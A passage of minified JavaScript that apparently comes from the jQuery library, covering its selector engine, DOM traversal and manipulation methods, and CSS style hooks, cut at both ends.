e},o=m.selectors={order:["ID","NAME","TAG"],match:{ID:/#((?:[\w\u00c0-\uFFFF\-]|\\.)+)/,CLASS:/\.((?:[\w\u00c0-\uFFFF\-]|\\.)+)/,NAME:/\[name=['"]*((?:[\w\u00c0-\uFFFF\-]|\\.)+)['"]*\]/,ATTR:/\[\s*((?:[\w\u00c0-\uFFFF\-]|\\.)+)\s*(?:(\S?=)\s*(?:(['"])(.*?)\3|(#?(?:[\w\u00c0-\uFFFF\-]|\\.)*)|)|)\s*\]/,TAG:/^((?:[\w\u00c0-\uFFFF\*\-]|\\.)+)/,CHILD:/:(only|nth|last|first)-child(?:\(\s*(even|odd|(?:[+\-]?\d+|(?:[+\-]?\d*)?n\s*(?:[+\-]\s*\d+)?))\s*\))?/,POS:/:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^\-]|$)/,PSEUDO:/:((?:[\w\u00c0-\uFFFF\-]|\\.)+)(?:\((['"]?)((?:\([^\)]+\)|[^\(\)]*)+)\2\))?/},leftMatch:{},attrMap:{"class":"className","for":"htmlFor"},attrHandle:{href:function(a){return a.getAttribute("href")},type:function(a){return a.getAttribute("type")}},relative:{"+":function(a,b){var c=typeof b=="string",d=c&&!l.test(b),e=c&&!d;d&&(b=b.toLowerCase());for(var f=0,g=a.length,h;f<g;f++)if(h=a[f]){while((h=h.previousSibling)&&h.nodeType!==1);a[f]=e||h&&h.nodeName.toLowerCase()===b?h||!1:h===b}e&&m.filter(b,a,!0)},">":function(a,b){var c,d=typeof b=="string",e=0,f=a.length;if(d&&!l.test(b)){b=b.toLowerCase();for(;e<f;e++){c=a[e];if(c){var g=c.parentNode;a[e]=g.nodeName.toLowerCase()===b?g:!1}}}else{for(;e<f;e++)c=a[e],c&&(a[e]=d?c.parentNode:c.parentNode===b);d&&m.filter(b,a,!0)}},"":function(a,b,c){var d,f=e++,g=x;typeof b=="string"&&!l.test(b)&&(b=b.toLowerCase(),d=b,g=w),g("parentNode",b,f,a,d,c)},"~":function(a,b,c){var d,f=e++,g=x;typeof b=="string"&&!l.test(b)&&(b=b.toLowerCase(),d=b,g=w),g("previousSibling",b,f,a,d,c)}},find:{ID:function(a,b,c){if(typeof b.getElementById!="undefined"&&!c){var d=b.getElementById(a[1]);return d&&d.parentNode?[d]:[]}},NAME:function(a,b){if(typeof b.getElementsByName!="undefined"){var c=[],d=b.getElementsByName(a[1]);for(var e=0,f=d.length;e<f;e++)d[e].getAttribute("name")===a[1]&&c.push(d[e]);return c.length===0?null:c}},TAG:function(a,b){if(typeof b.getElementsByTagName!="undefined")return b.getElementsByTagName(a[1])}},preFilter:{CLASS:function(a,b,c,d,e,f){a=" "+a[1].replace(j,"")+" ";if(f)return a;for(var g=0,h;(h=b[g])!=null;g++)h&&(e^(h.className&&(" "+h.className+" ").replace(/[\t\n\r]/g," ").indexOf(a)>=0)?c||d.push(h):c&&(b[g]=!1));return!1},ID:function(a){return a[1].replace(j,"")},TAG:function(a,b){return a[1].replace(j,"").toLowerCase()},CHILD:function(a){if(a[1]==="nth"){a[2]||m.error(a[0]),a[2]=a[2].replace(/^\+|\s*/g,"");var b=/(-?)(\d*)(?:n([+\-]?\d*))?/.exec(a[2]==="even"&&"2n"||a[2]==="odd"&&"2n+1"||!/\D/.test(a[2])&&"0n+"+a[2]||a[2]);a[2]=b[1]+(b[2]||1)-0,a[3]=b[3]-0}else a[2]&&m.error(a[0]);a[0]=e++;return a},ATTR:function(a,b,c,d,e,f){var g=a[1]=a[1].replace(j,"");!f&&o.attrMap[g]&&(a[1]=o.attrMap[g]),a[4]=(a[4]||a[5]||"").replace(j,""),a[2]==="~="&&(a[4]=" "+a[4]+" ");return a},PSEUDO:function(b,c,d,e,f){if(b[1]==="not")if((a.exec(b[3])||"").length>1||/^\w/.test(b[3]))b[3]=m(b[3],null,null,c);else{var g=m.filter(b[3],c,d,!0^f);d||e.push.apply(e,g);return!1}else if(o.match.POS.test(b[0])||o.match.CHILD.test(b[0]))return!0;return b},POS:function(a){a.unshift(!0);return a}},filters:{enabled:function(a){return a.disabled===!1&&a.type!=="hidden"},disabled:function(a){return a.disabled===!0},checked:function(a){return a.checked===!0},selected:function(a){a.parentNode&&a.parentNode.selectedIndex;return a.selected===!0},parent:function(a){return!!a.firstChild},empty:function(a){return!a.firstChild},has:function(a,b,c){return!!m(c[3],a).length},header:function(a){return/h\d/i.test(a.nodeName)},text:function(a){var b=a.getAttribute("type"),c=a.type;return a.nodeName.toLowerCase()==="input"&&"text"===c&&(b===c||b===null)},radio:function(a){return a.nodeName.toLowerCase()==="input"&&"radio"===a.type},checkbox:function(a){return a.nodeName.toLowerCase()==="input"&&"checkbox"===a.type},file:function(a){return a.nodeName.toLowerCase()==="input"&&"file"===a.type},password:function(a){return a.nodeName.toLowerCase()==="input"&&"password"===a.type},submit:function(a){var b=a.nodeName.toLowerCase();return(b==="input"||b==="button")&&"submit"===a.type},image:function(a){return a.nodeName.toLowerCase()==="input"&&"image"===a.type},reset:function(a){var b=a.nodeName.toLowerCase();return(b==="input"||b==="button")&&"reset"===a.type},button:function(a){var b=a.nodeName.toLowerCase();return b==="input"&&"button"===a.type||b==="button"},input:function(a){return/input|select|textarea|button/i.test(a.nodeName)},focus:function(a){return a===a.ownerDocument.activeElement}},setFilters:{first:function(a,b){return b===0},last:function(a,b,c,d){return b===d.length-1},even:function(a,b){return b%2===0},odd:function(a,b){return b%2===1},lt:function(a,b,c){return b<c[3]-0},gt:function(a,b,c){return b>c[3]-0},nth:function(a,b,c){return c[3]-0===b},eq:function(a,b,c){return c[3]-0===b}},filter:{PSEUDO:function(a,b,c,d){var e=b[1],f=o.filters[e];if(f)return f(a,c,b,d);if(e==="contains")return(a.textContent||a.innerText||n([a])||"").indexOf(b[3])>=0;if(e==="not"){var g=b[3];for(var h=0,i=g.length;h<i;h++)if(g[h]===a)return!1;return!0}m.error(e)},CHILD:function(a,b){var c,e,f,g,h,i,j,k=b[1],l=a;switch(k){case"only":case"first":while(l=l.previousSibling)if(l.nodeType===1)return!1;if(k==="first")return!0;l=a;case"last":while(l=l.nextSibling)if(l.nodeType===1)return!1;return!0;case"nth":c=b[2],e=b[3];if(c===1&&e===0)return!0;f=b[0],g=a.parentNode;if(g&&(g[d]!==f||!a.nodeIndex)){i=0;for(l=g.firstChild;l;l=l.nextSibling)l.nodeType===1&&(l.nodeIndex=++i);g[d]=f}j=a.nodeIndex-e;return c===0?j===0:j%c===0&&j/c>=0}},ID:function(a,b){return a.nodeType===1&&a.getAttribute("id")===b},TAG:function(a,b){return b==="*"&&a.nodeType===1||!!a.nodeName&&a.nodeName.toLowerCase()===b},CLASS:function(a,b){return(" "+(a.className||a.getAttribute("class"))+" ").indexOf(b)>-1},ATTR:function(a,b){var c=b[1],d=m.attr?m.attr(a,c):o.attrHandle[c]?o.attrHandle[c](a):a[c]!=null?a[c]:a.getAttribute(c),e=d+"",f=b[2],g=b[4];return d==null?f==="!=":!f&&m.attr?d!=null:f==="="?e===g:f==="*="?e.indexOf(g)>=0:f==="~="?(" "+e+" ").indexOf(g)>=0:g?f==="!="?e!==g:f==="^="?e.indexOf(g)===0:f==="$="?e.substr(e.length-g.length)===g:f==="|="?e===g||e.substr(0,g.length+1)===g+"-":!1:e&&d!==!1},POS:function(a,b,c,d){var e=b[2],f=o.setFilters[e];if(f)return f(a,c,b,d)}}},p=o.match.POS,q=function(a,b){return"\\"+(b-0+1)};for(var r in o.match)o.match[r]=new RegExp(o.match[r].source+/(?![^\[]*\])(?![^\(]*\))/.source),o.leftMatch[r]=new RegExp(/(^(?:.|\r|\n)*?)/.source+o.match[r].source.replace(/\\(\d+)/g,q));var s=function(a,b){a=Array.prototype.slice.call(a,0);if(b){b.push.apply(b,a);return b}return a};try{Array.prototype.slice.call(c.documentElement.childNodes,0)[0].nodeType}catch(t){s=function(a,b){var c=0,d=b||[];if(g.call(a)==="[object Array]")Array.prototype.push.apply(d,a);else if(typeof a.length=="number")for(var e=a.length;c<e;c++)d.push(a[c]);else for(;a[c];c++)d.push(a[c]);return d}}var u,v;c.documentElement.compareDocumentPosition?u=function(a,b){if(a===b){h=!0;return 0}if(!a.compareDocumentPosition||!b.compareDocumentPosition)return a.compareDocumentPosition?-1:1;return a.compareDocumentPosition(b)&4?-1:1}:(u=function(a,b){if(a===b){h=!0;return 0}if(a.sourceIndex&&b.sourceIndex)return a.sourceIndex-b.sourceIndex;var c,d,e=[],f=[],g=a.parentNode,i=b.parentNode,j=g;if(g===i)return v(a,b);if(!g)return-1;if(!i)return 1;while(j)e.unshift(j),j=j.parentNode;j=i;while(j)f.unshift(j),j=j.parentNode;c=e.length,d=f.length;for(var k=0;k<c&&k<d;k++)if(e[k]!==f[k])return v(e[k],f[k]);return k===c?v(a,f[k],-1):v(e[k],b,1)},v=function(a,b,c){if(a===b)return c;var d=a.nextSibling;while(d){if(d===b)return-1;d=d.nextSibling}return 1}),function(){var a=c.createElement("div"),d="script"+(new Date).getTime(),e=c.documentElement;a.innerHTML="<a name='"+d+"'/>",e.insertBefore(a,e.firstChild),c.getElementById(d)&&(o.find.ID=function(a,c,d){if(typeof c.getElementById!="undefined"&&!d){var e=c.getElementById(a[1]);return e?e.id===a[1]||typeof e.getAttributeNode!="undefined"&&e.getAttributeNode("id").nodeValue===a[1]?[e]:b:[]}},o.filter.ID=function(a,b){var c=typeof a.getAttributeNode!="undefined"&&a.getAttributeNode("id");return a.nodeType===1&&c&&c.nodeValue===b}),e.removeChild(a),e=a=null}(),function(){var a=c.createElement("div");a.appendChild(c.createComment("")),a.getElementsByTagName("*").length>0&&(o.find.TAG=function(a,b){var c=b.getElementsByTagName(a[1]);if(a[1]==="*"){var d=[];for(var e=0;c[e];e++)c[e].nodeType===1&&d.push(c[e]);c=d}return c}),a.innerHTML="<a href='#'></a>",a.firstChild&&typeof a.firstChild.getAttribute!="undefined"&&a.firstChild.getAttribute("href")!=="#"&&(o.attrHandle.href=function(a){return a.getAttribute("href",2)}),a=null}(),c.querySelectorAll&&function(){var a=m,b=c.createElement("div"),d="__sizzle__";b.innerHTML="<p class='TEST'></p>";if(!b.querySelectorAll||b.querySelectorAll(".TEST").length!==0){m=function(b,e,f,g){e=e||c;if(!g&&!m.isXML(e)){var h=/^(\w+$)|^\.([\w\-]+$)|^#([\w\-]+$)/.exec(b);if(h&&(e.nodeType===1||e.nodeType===9)){if(h[1])return s(e.getElementsByTagName(b),f);if(h[2]&&o.find.CLASS&&e.getElementsByClassName)return s(e.getElementsByClassName(h[2]),f)}if(e.nodeType===9){if(b==="body"&&e.body)return s([e.body],f);if(h&&h[3]){var i=e.getElementById(h[3]);if(!i||!i.parentNode)return s([],f);if(i.id===h[3])return s([i],f)}try{return s(e.querySelectorAll(b),f)}catch(j){}}else if(e.nodeType===1&&e.nodeName.toLowerCase()!=="object"){var k=e,l=e.getAttribute("id"),n=l||d,p=e.parentNode,q=/^\s*[+~]/.test(b);l?n=n.replace(/'/g,"\\$&"):e.setAttribute("id",n),q&&p&&(e=e.parentNode);try{if(!q||p)return s(e.querySelectorAll("[id='"+n+"'] "+b),f)}catch(r){}finally{l||k.removeAttribute("id")}}}return a(b,e,f,g)};for(var e in a)m[e]=a[e];b=null}}(),function(){var a=c.documentElement,b=a.matchesSelector||a.mozMatchesSelector||a.webkitMatchesSelector||a.msMatchesSelector;if(b){var d=!b.call(c.createElement("div"),"div"),e=!1;try{b.call(c.documentElement,"[test!='']:sizzle")}catch(f){e=!0}m.matchesSelector=function(a,c){c=c.replace(/\=\s*([^'"\]]*)\s*\]/g,"='$1']");if(!m.isXML(a))try{if(e||!o.match.PSEUDO.test(c)&&!/!=/.test(c)){var f=b.call(a,c);if(f||!d||a.document&&a.document.nodeType!==11)return f}}catch(g){}return m(c,null,null,[a]).length>0}}}(),function(){var a=c.createElement("div");a.innerHTML="<div class='test e'></div><div class='test'></div>";if(!!a.getElementsByClassName&&a.getElementsByClassName("e").length!==0){a.lastChild.className="e";if(a.getElementsByClassName("e").length===1)return;o.order.splice(1,0,"CLASS"),o.find.CLASS=function(a,b,c){if(typeof b.getElementsByClassName!="undefined"&&!c)return b.getElementsByClassName(a[1])},a=null}}(),c.documentElement.contains?m.contains=function(a,b){return a!==b&&(a.contains?a.contains(b):!0)}:c.documentElement.compareDocumentPosition?m.contains=function(a,b){return!!(a.compareDocumentPosition(b)&16)}:m.contains=function(){return!1},m.isXML=function(a){var b=(a?a.ownerDocument||a:0).documentElement;return b?b.nodeName!=="HTML":!1};var y=function(a,b,c){var d,e=[],f="",g=b.nodeType?[b]:b;while(d=o.match.PSEUDO.exec(a))f+=d[0],a=a.replace(o.match.PSEUDO,"");a=o.relative[a]?a+"*":a;for(var h=0,i=g.length;h<i;h++)m(a,g[h],e,c);return m.filter(f,e)};m.attr=f.attr,m.selectors.attrMap={},f.find=m,f.expr=m.selectors,f.expr[":"]=f.expr.filters,f.unique=m.uniqueSort,f.text=m.getText,f.isXMLDoc=m.isXML,f.contains=m.contains}();var L=/Until$/,M=/^(?:parents|prevUntil|prevAll)/,N=/,/,O=/^.[^:#\[\.,]*$/,P=Array.prototype.slice,Q=f.expr.match.POS,R={children:!0,contents:!0,next:!0,prev:!0};f.fn.extend({find:function(a){var b=this,c,d;if(typeof a!="string")return f(a).filter(function(){for(c=0,d=b.length;c<d;c++)if(f.contains(b[c],this))return!0});var e=this.pushStack("","find",a),g,h,i;for(c=0,d=this.length;c<d;c++){g=e.length,f.find(a,this[c],e);if(c>0)for(h=g;h<e.length;h++)for(i=0;i<g;i++)if(e[i]===e[h]){e.splice(h--,1);break}}return e},has:function(a){var b=f(a);return this.filter(function(){for(var a=0,c=b.length;a<c;a++)if(f.contains(this,b[a]))return!0})},not:function(a){return this.pushStack(T(this,a,!1),"not",a)},filter:function(a){return this.pushStack(T(this,a,!0),"filter",a)},is:function(a){return!!a&&(typeof a=="string"?Q.test(a)?f(a,this.context).index(this[0])>=0:f.filter(a,this).length>0:this.filter(a).length>0)},closest:function(a,b){var c=[],d,e,g=this[0];if(f.isArray(a)){var h=1;while(g&&g.ownerDocument&&g!==b){for(d=0;d<a.length;d++)f(g).is(a[d])&&c.push({selector:a[d],elem:g,level:h});g=g.parentNode,h++}return c}var i=Q.test(a)||typeof a!="string"?f(a,b||this.context):0;for(d=0,e=this.length;d<e;d++){g=this[d];while(g){if(i?i.index(g)>-1:f.find.matchesSelector(g,a)){c.push(g);break}g=g.parentNode;if(!g||!g.ownerDocument||g===b||g.nodeType===11)break}}c=c.length>1?f.unique(c):c;return this.pushStack(c,"closest",a)},index:function(a){if(!a)return this[0]&&this[0].parentNode?this.prevAll().length:-1;if(typeof a=="string")return f.inArray(this[0],f(a));return f.inArray(a.jquery?a[0]:a,this)},add:function(a,b){var c=typeof a=="string"?f(a,b):f.makeArray(a&&a.nodeType?[a]:a),d=f.merge(this.get(),c);return this.pushStack(S(c[0])||S(d[0])?d:f.unique(d))},andSelf:function(){return this.add(this.prevObject)}}),f.each({parent:function(a){var b=a.parentNode;return b&&b.nodeType!==11?b:null},parents:function(a){return f.dir(a,"parentNode")},parentsUntil:function(a,b,c){return f.dir(a,"parentNode",c)},next:function(a){return f.nth(a,2,"nextSibling")},prev:function(a){return f.nth(a,2,"previousSibling")},nextAll:function(a){return f.dir(a,"nextSibling")},prevAll:function(a){return f.dir(a,"previousSibling")},nextUntil:function(a,b,c){return f.dir(a,"nextSibling",c)},prevUntil:function(a,b,c){return f.dir(a,"previousSibling",c)},siblings:function(a){return f.sibling(a.parentNode.firstChild,a)},children:function(a){return f.sibling(a.firstChild)},contents:function(a){return f.nodeName(a,"iframe")?a.contentDocument||a.contentWindow.document:f.makeArray(a.childNodes)}},function(a,b){f.fn[a]=function(c,d){var e=f.map(this,b,c);L.test(a)||(d=c),d&&typeof d=="string"&&(e=f.filter(d,e)),e=this.length>1&&!R[a]?f.unique(e):e,(this.length>1||N.test(d))&&M.test(a)&&(e=e.reverse());return this.pushStack(e,a,P.call(arguments).join(","))}}),f.extend({filter:function(a,b,c){c&&(a=":not("+a+")");return b.length===1?f.find.matchesSelector(b[0],a)?[b[0]]:[]:f.find.matches(a,b)},dir:function(a,c,d){var e=[],g=a[c];while(g&&g.nodeType!==9&&(d===b||g.nodeType!==1||!f(g).is(d)))g.nodeType===1&&e.push(g),g=g[c];return e},nth:function(a,b,c,d){b=b||1;var e=0;for(;a;a=a[c])if(a.nodeType===1&&++e===b)break;return a},sibling:function(a,b){var c=[];for(;a;a=a.nextSibling)a.nodeType===1&&a!==b&&c.push(a);return c}});var V="abbr|article|aside|audio|canvas|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",W=/ jQuery\d+="(?:\d+|null)"/g,X=/^\s+/,Y=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/ig,Z=/<([\w:]+)/,$=/<tbody/i,_=/<|&#?\w+;/,ba=/<(?:script|style)/i,bb=/<(?:script|object|embed|option|style)/i,bc=new RegExp("<(?:"+V+")","i"),bd=/checked\s*(?:[^=]|=\s*.checked.)/i,be=/\/(java|ecma)script/i,bf=/^\s*<!(?:\[CDATA\[|\-\-)/,bg={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],area:[1,"<map>","</map>"],_default:[0,"",""]},bh=U(c);bg.optgroup=bg.option,bg.tbody=bg.tfoot=bg.colgroup=bg.caption=bg.thead,bg.th=bg.td,f.support.htmlSerialize||(bg._default=[1,"div<div>","</div>"]),f.fn.extend({text:function(a){if(f.isFunction(a))return this.each(function(b){var c=f(this);c.text(a.call(this,b,c.text()))});if(typeof a!="object"&&a!==b)return this.empty().append((this[0]&&this[0].ownerDocument||c).createTextNode(a));return f.text(this)},wrapAll:function(a){if(f.isFunction(a))return this.each(function(b){f(this).wrapAll(a.call(this,b))});if(this[0]){var b=f(a,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&b.insertBefore(this[0]),b.map(function(){var a=this;while(a.firstChild&&a.firstChild.nodeType===1)a=a.firstChild;return a}).append(this)}return this},wrapInner:function(a){if(f.isFunction(a))return this.each(function(b){f(this).wrapInner(a.call(this,b))});return this.each(function(){var b=f(this),c=b.contents();c.length?c.wrapAll(a):b.append(a)})},wrap:function(a){var b=f.isFunction(a);return this.each(function(c){f(this).wrapAll(b?a.call(this,c):a)})},unwrap:function(){return this.parent().each(function(){f.nodeName(this,"body")||f(this).replaceWith(this.childNodes)}).end()},append:function(){return this.domManip(arguments,!0,function(a){this.nodeType===1&&this.appendChild(a)})},prepend:function(){return this.domManip(arguments,!0,function(a){this.nodeType===1&&this.insertBefore(a,this.firstChild)})},before:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,!1,function(a){this.parentNode.insertBefore(a,this)});if(arguments.length){var a=f.clean(arguments);a.push.apply(a,this.toArray());return this.pushStack(a,"before",arguments)}},after:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,!1,function(a){this.parentNode.insertBefore(a,this.nextSibling)});if(arguments.length){var a=this.pushStack(this,"after",arguments);a.push.apply(a,f.clean(arguments));return a}},remove:function(a,b){for(var c=0,d;(d=this[c])!=null;c++)if(!a||f.filter(a,[d]).length)!b&&d.nodeType===1&&(f.cleanData(d.getElementsByTagName("*")),f.cleanData([d])),d.parentNode&&d.parentNode.removeChild(d);return this},empty:function()
-{for(var a=0,b;(b=this[a])!=null;a++){b.nodeType===1&&f.cleanData(b.getElementsByTagName("*"));while(b.firstChild)b.removeChild(b.firstChild)}return this},clone:function(a,b){a=a==null?!1:a,b=b==null?a:b;return this.map(function(){return f.clone(this,a,b)})},html:function(a){if(a===b)return this[0]&&this[0].nodeType===1?this[0].innerHTML.replace(W,""):null;if(typeof a=="string"&&!ba.test(a)&&(f.support.leadingWhitespace||!X.test(a))&&!bg[(Z.exec(a)||["",""])[1].toLowerCase()]){a=a.replace(Y,"<$1></$2>");try{for(var c=0,d=this.length;c<d;c++)this[c].nodeType===1&&(f.cleanData(this[c].getElementsByTagName("*")),this[c].innerHTML=a)}catch(e){this.empty().append(a)}}else f.isFunction(a)?this.each(function(b){var c=f(this);c.html(a.call(this,b,c.html()))}):this.empty().append(a);return this},replaceWith:function(a){if(this[0]&&this[0].parentNode){if(f.isFunction(a))return this.each(function(b){var c=f(this),d=c.html();c.replaceWith(a.call(this,b,d))});typeof a!="string"&&(a=f(a).detach());return this.each(function(){var b=this.nextSibling,c=this.parentNode;f(this).remove(),b?f(b).before(a):f(c).append(a)})}return this.length?this.pushStack(f(f.isFunction(a)?a():a),"replaceWith",a):this},detach:function(a){return this.remove(a,!0)},domManip:function(a,c,d){var e,g,h,i,j=a[0],k=[];if(!f.support.checkClone&&arguments.length===3&&typeof j=="string"&&bd.test(j))return this.each(function(){f(this).domManip(a,c,d,!0)});if(f.isFunction(j))return this.each(function(e){var g=f(this);a[0]=j.call(this,e,c?g.html():b),g.domManip(a,c,d)});if(this[0]){i=j&&j.parentNode,f.support.parentNode&&i&&i.nodeType===11&&i.childNodes.length===this.length?e={fragment:i}:e=f.buildFragment(a,this,k),h=e.fragment,h.childNodes.length===1?g=h=h.firstChild:g=h.firstChild;if(g){c=c&&f.nodeName(g,"tr");for(var l=0,m=this.length,n=m-1;l<m;l++)d.call(c?bi(this[l],g):this[l],e.cacheable||m>1&&l<n?f.clone(h,!0,!0):h)}k.length&&f.each(k,bp)}return this}}),f.buildFragment=function(a,b,d){var e,g,h,i,j=a[0];b&&b[0]&&(i=b[0].ownerDocument||b[0]),i.createDocumentFragment||(i=c),a.length===1&&typeof j=="string"&&j.length<512&&i===c&&j.charAt(0)==="<"&&!bb.test(j)&&(f.support.checkClone||!bd.test(j))&&(f.support.html5Clone||!bc.test(j))&&(g=!0,h=f.fragments[j],h&&h!==1&&(e=h)),e||(e=i.createDocumentFragment(),f.clean(a,i,e,d)),g&&(f.fragments[j]=h?e:1);return{fragment:e,cacheable:g}},f.fragments={},f.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){f.fn[a]=function(c){var d=[],e=f(c),g=this.length===1&&this[0].parentNode;if(g&&g.nodeType===11&&g.childNodes.length===1&&e.length===1){e[b](this[0]);return this}for(var h=0,i=e.length;h<i;h++){var j=(h>0?this.clone(!0):this).get();f(e[h])[b](j),d=d.concat(j)}return this.pushStack(d,a,e.selector)}}),f.extend({clone:function(a,b,c){var d,e,g,h=f.support.html5Clone||!bc.test("<"+a.nodeName)?a.cloneNode(!0):bo(a);if((!f.support.noCloneEvent||!f.support.noCloneChecked)&&(a.nodeType===1||a.nodeType===11)&&!f.isXMLDoc(a)){bk(a,h),d=bl(a),e=bl(h);for(g=0;d[g];++g)e[g]&&bk(d[g],e[g])}if(b){bj(a,h);if(c){d=bl(a),e=bl(h);for(g=0;d[g];++g)bj(d[g],e[g])}}d=e=null;return h},clean:function(a,b,d,e){var g;b=b||c,typeof b.createElement=="undefined"&&(b=b.ownerDocument||b[0]&&b[0].ownerDocument||c);var h=[],i;for(var j=0,k;(k=a[j])!=null;j++){typeof k=="number"&&(k+="");if(!k)continue;if(typeof k=="string")if(!_.test(k))k=b.createTextNode(k);else{k=k.replace(Y,"<$1></$2>");var l=(Z.exec(k)||["",""])[1].toLowerCase(),m=bg[l]||bg._default,n=m[0],o=b.createElement("div");b===c?bh.appendChild(o):U(b).appendChild(o),o.innerHTML=m[1]+k+m[2];while(n--)o=o.lastChild;if(!f.support.tbody){var p=$.test(k),q=l==="table"&&!p?o.firstChild&&o.firstChild.childNodes:m[1]==="<table>"&&!p?o.childNodes:[];for(i=q.length-1;i>=0;--i)f.nodeName(q[i],"tbody")&&!q[i].childNodes.length&&q[i].parentNode.removeChild(q[i])}!f.support.leadingWhitespace&&X.test(k)&&o.insertBefore(b.createTextNode(X.exec(k)[0]),o.firstChild),k=o.childNodes}var r;if(!f.support.appendChecked)if(k[0]&&typeof (r=k.length)=="number")for(i=0;i<r;i++)bn(k[i]);else bn(k);k.nodeType?h.push(k):h=f.merge(h,k)}if(d){g=function(a){return!a.type||be.test(a.type)};for(j=0;h[j];j++)if(e&&f.nodeName(h[j],"script")&&(!h[j].type||h[j].type.toLowerCase()==="text/javascript"))e.push(h[j].parentNode?h[j].parentNode.removeChild(h[j]):h[j]);else{if(h[j].nodeType===1){var s=f.grep(h[j].getElementsByTagName("script"),g);h.splice.apply(h,[j+1,0].concat(s))}d.appendChild(h[j])}}return h},cleanData:function(a){var b,c,d=f.cache,e=f.event.special,g=f.support.deleteExpando;for(var h=0,i;(i=a[h])!=null;h++){if(i.nodeName&&f.noData[i.nodeName.toLowerCase()])continue;c=i[f.expando];if(c){b=d[c];if(b&&b.events){for(var j in b.events)e[j]?f.event.remove(i,j):f.removeEvent(i,j,b.handle);b.handle&&(b.handle.elem=null)}g?delete i[f.expando]:i.removeAttribute&&i.removeAttribute(f.expando),delete d[c]}}}});var bq=/alpha\([^)]*\)/i,br=/opacity=([^)]*)/,bs=/([A-Z]|^ms)/g,bt=/^-?\d+(?:px)?$/i,bu=/^-?\d/,bv=/^([\-+])=([\-+.\de]+)/,bw={position:"absolute",visibility:"hidden",display:"block"},bx=["Left","Right"],by=["Top","Bottom"],bz,bA,bB;f.fn.css=function(a,c){if(arguments.length===2&&c===b)return this;return f.access(this,a,c,!0,function(a,c,d){return d!==b?f.style(a,c,d):f.css(a,c)})},f.extend({cssHooks:{opacity:{get:function(a,b){if(b){var c=bz(a,"opacity","opacity");return c===""?"1":c}return a.style.opacity}}},cssNumber:{fillOpacity:!0,fontWeight:!0,lineHeight:!0,opacity:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":f.support.cssFloat?"cssFloat":"styleFloat"},style:function(a,c,d,e){if(!!a&&a.nodeType!==3&&a.nodeType!==8&&!!a.style){var g,h,i=f.camelCase(c),j=a.style,k=f.cssHooks[i];c=f.cssProps[i]||i;if(d===b){if(k&&"get"in k&&(g=k.get(a,!1,e))!==b)return g;return j[c]}h=typeof d,h==="string"&&(g=bv.exec(d))&&(d=+(g[1]+1)*+g[2]+parseFloat(f.css(a,c)),h="number");if(d==null||h==="number"&&isNaN(d))return;h==="number"&&!f.cssNumber[i]&&(d+="px");if(!k||!("set"in k)||(d=k.set(a,d))!==b)try{j[c]=d}catch(l){}}},css:function(a,c,d){var e,g;c=f.camelCase(c),g=f.cssHooks[c],c=f.cssProps[c]||c,c==="cssFloat"&&(c="float");if(g&&"get"in g&&(e=g.get(a,!0,d))!==b)return e;if(bz)return bz(a,c)},swap:function(a,b,c){var d={};for(var e in b)d[e]=a.style[e],a.style[e]=b[e];c.call(a);for(e in b)a.style[e]=d[e]}}),f.curCSS=f.css,f.each(["height","width"],function(a,b){f.cssHooks[b]={get:function(a,c,d){var e;if(c){if(a.offsetWidth!==0)return bC(a,b,d);f.swap(a,bw,function(){e=bC(a,b,d)});return e}},set:function(a,b){if(!bt.test(b))return b;b=parseFloat(b);if(b>=0)return b+"px"}}}),f.support.opacity||(f.cssHooks.opacity={get:function(a,b){return br.test((b&&a.currentStyle?a.currentStyle.filter:a.style.filter)||"")?parseFloat(RegExp.$1)/100+"":b?"1":""},set:function(a,b){var c=a.style,d=a.currentStyle,e=f.isNumeric(b)?"alpha(opacity="+b*100+")":"",g=d&&d.filter||c.filter||"";c.zoom=1;if(b>=1&&f.trim(g.replace(bq,""))===""){c.removeAttribute("filter");if(d&&!d.filter)return}c.filter=bq.test(g)?g.replace(bq,e):g+" "+e}}),f(function(){f.support.reliableMarginRight||(f.cssHooks.marginRight={get:function(a,b){var c;f.swap(a,{display:"inline-block"},function(){b?c=bz(a,"margin-right","marginRight"):c=a.style.marginRight});return c}})}),c.defaultView&&c.defaultView.getComputedStyle&&(bA=function(a,b){var c,d,e;b=b.replace(bs,"-$1").toLowerCase(),(d=a.ownerDocument.defaultView)&&(e=d.getComputedStyle(a,null))&&(c=e.getPropertyValue(b),c===""&&!f.contains(a.ownerDocument.documentElement,a)&&(c=f.style(a,b)));return c}),c.documentElement.currentStyle&&(bB=function(a,b){var c,d,e,f=a.currentStyle&&a.currentStyle[b],g=a.style;f===null&&g&&(e=g[b])&&(f=e),!bt.test(f)&&bu.test(f)&&(c=g.left,d=a.runtimeStyle&&a.runtimeStyle.left,d&&(a.runtimeStyle.left=a.currentStyle.left),g.left=b==="fontSize"?"1em":f||0,f=g.pixelLeft+"px",g.left=c,d&&(a.runtimeStyle.left=d));return f===""?"auto":f}),bz=bA||bB,f.expr&&f.expr.filters&&(f.expr.filters.hidden=function(a){var b=a.offsetWidth,c=a.offsetHeight;return b===0&&c===0||!f.support.reliableHiddenOffsets&&(a.style&&a.style.display||f.css(a,"display"))==="none"},f.expr.filters.visible=function(a){return!f.expr.filters.hidden(a)});var bD=/%20/g,bE=/\[\]$/,bF=/\r?\n/g,bG=/#.*$/,bH=/^(.*?):[ 